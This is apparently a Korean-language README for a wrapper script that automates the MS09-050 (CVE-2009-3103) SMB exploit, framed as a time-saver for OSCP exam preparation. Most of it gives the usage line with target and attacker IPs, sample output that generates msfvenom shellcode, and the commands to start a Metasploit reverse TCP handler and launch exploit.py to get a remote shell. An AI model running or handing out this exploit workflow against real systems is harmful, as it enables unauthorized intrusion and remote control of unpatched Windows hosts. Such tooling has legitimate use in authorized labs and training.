
MS09-050 (CVE-2009-3103) 익스플로잇을 위한 한 줄 설정. 번거로움 없이, 디버깅 없이, 그냥 작동합니다.
돌아다니는 대부분의 MS09-050 스크립트는 수동 셸코드 주입이 필요하고, 핸들러와 타이밍 문제가 있거나, 그냥 작동하지 않습니다. 이 래퍼는:
시간이 중요한 OSCP 준비를 위해 제작되었습니다.
msfvenommsfconsolepython2rpcclient (보통 사전 설치됨)./ms09_050.sh <TARGET_IP> <YOUR_IP> [PORT]
./ms09_050.sh 192.168.233.40 192.168.45.232 443
출력:
[*] Target: 192.168.233.40 | LHOST: 192.168.45.232 | LPORT: 443
[*] Generating shellcode...
[+] Files created:
- exploit.py
- handler.rc
=== RUN ===
Terminal 1: msfconsole -q -r handler.rc
Terminal 2: python2 exploit.py 192.168.233.40
터미널 1 - 핸들러 시작:
msfconsole -q -r handler.rc
Started reverse TCP handler on ...을 기다립니다.
터미널 2 - 익스플로잇 실행:
python2 exploit.py 192.168.233.40
터미널 1에서 셸을 확인합니다.
windows/shell/reverse_tcp) 사용 - 이 익스플로잇의 스테이저와 안정적으로 작동원본 익스플로잇은 ohnozzy의 MS09-050 PoC를 기반으로 함.
MIT - 원하는 대로 사용하되, 악용하지 마세요.